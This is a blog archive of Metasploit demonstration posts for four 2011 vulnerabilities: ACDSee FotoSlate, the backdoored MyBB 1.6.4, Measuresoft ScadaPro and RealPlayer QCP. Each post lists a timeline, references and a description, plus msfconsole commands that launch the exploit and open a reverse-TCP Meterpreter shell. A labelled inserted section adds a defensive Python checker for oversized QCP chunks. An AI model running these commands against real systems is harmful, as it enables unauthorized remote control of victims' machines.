Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Parvez Anwar
Public release of the vulnerability on 2011-09-12
Metasploit PoC provided on 2011-10-10

PoC provided by :

Parvez Anwar
juan vazquez

Reference(s) :

CVE-2011-2595
OSVDB-75425

Affected version(s) :

ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.

Tested on Windows XP SP3 with :

ACDSee FotoSlate 4.0 Build 146

Description :

This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.

Commands :

use exploit/windows/fileformat/acdsee_fotoslate_string
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

MyBB 1.6.4 Backdoor Metasploit Demo

Timeline :

Vulnerability discovered by the vendor on 2011-10-06
Public release of the vulnerability on 2011-10-06
Metasploit PoC provided on 2011-10-08

PoC provided by :

tdz

Reference(s) :

SA46300

Affected version(s) :

MyBB 1.6.4 source packages distributed prior to October 6th, 2011 are vulnerable.

Tested on Ubuntu 10.04.3 LTS with :

MyBB 1.6.4

Description :

MyBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor’s source package.

Commands :

use exploit/unix/webapp/mybb_backdoor
set RHOST 192.168.178.21
set VHOST blackbox.zataz.loc
set URI /mybb/index.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

EDB-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo

Timeline :

Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability on 2011-09-13
Metasploit PoC provided on 2011-09-16

PoC provided by :

Luigi Auriemma
mr_me
TecR0c

Reference(s) :

EDB-ID-17848

Affected version(s) :

All Measuresoft ScadaPro before version 4.0.1

Tested on Windows XP SP3 with :

Measuresoft ScadaPro 3.9.15.0 / 3.1.9

Description :

This module allows remote attackers to execute arbitrary commands on the affected system by abusing a directory traversal in the ‘xf’ command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.

Commands :

use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit

getuid
sysinfo

CVE-2011-2950 : RealNetworks RealPlayer QCP Parsing Heap Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to vendor by ZDI on 2011-04-01
Coordinated public release of the vulnerability on 2011-08-16
Metasploit PoC provided on 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in RealPlayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied into it within a memory copy loop. This allows a remote attacker to execute arbitrary code in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this time the module exploits the flaw on Windows XP with IE6 and IE7.
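As an added illustration (not part of the original post or of the Metasploit module), a small Python checker that parses RIFF chunk headers and flags .QCP files whose “fmt” chunk declares more data than the 256-byte heap buffer described above would hold. It assumes the standard RIFF layout with form type QLCM; the sample file it builds is constructed test input filled with zero bytes.

```python
import struct

# Size of the static heap buffer that qcpfformat.dll copies "fmt" chunk data into,
# as stated in the module description above.
FMT_BUFFER_SIZE = 256


def riff_chunks(data):
    """Parse a RIFF container; return (form_type, [(chunk_id, declared_size, truncated)]).

    Assumption (not stated on the page): QCP files use the RIFF layout
    'RIFF' <u32 size> <form type> followed by <id><u32 size><payload> chunks.
    """
    if len(data) < 12 or data[:4] != b"RIFF":
        raise ValueError("not a RIFF container")
    form_type = data[8:12]
    chunks = []
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        truncated = pos + 8 + size > len(data)  # declared size runs past end of file
        chunks.append((chunk_id, size, truncated))
        pos += 8 + size + (size & 1)  # RIFF pads odd-sized chunks to an even boundary
    return form_type, chunks


def qcp_fmt_findings(data, limit=FMT_BUFFER_SIZE):
    """Return human-readable findings for 'fmt ' chunks that could overrun a fixed
    buffer of `limit` bytes. The declared size is what a copy loop trusts, so it is
    checked rather than the bytes actually present. Empty list means nothing suspicious."""
    _form_type, chunks = riff_chunks(data)
    findings = []
    for chunk_id, size, truncated in chunks:
        if chunk_id != b"fmt ":
            continue
        if size > limit:
            findings.append("fmt chunk declares %d bytes, exceeds %d-byte buffer" % (size, limit))
        if truncated:
            findings.append("fmt chunk declared size runs past end of file")
    return findings


def build_test_qcp(fmt_size):
    """Constructed test input: a minimal RIFF/QLCM file whose fmt chunk is fmt_size zero bytes."""
    fmt_chunk = b"fmt " + struct.pack("<I", fmt_size) + b"\x00" * fmt_size
    if fmt_size & 1:
        fmt_chunk += b"\x00"  # RIFF padding byte
    body = b"QLCM" + fmt_chunk  # assumption: QCP form type is 'QLCM'
    return b"RIFF" + struct.pack("<I", len(body)) + body
```

Run `qcp_fmt_findings(open(path, "rb").read())` over files pulled from mail or proxy logs to triage them before they reach a client with a vulnerable RealPlayer build.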

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit

getuid
sysinfo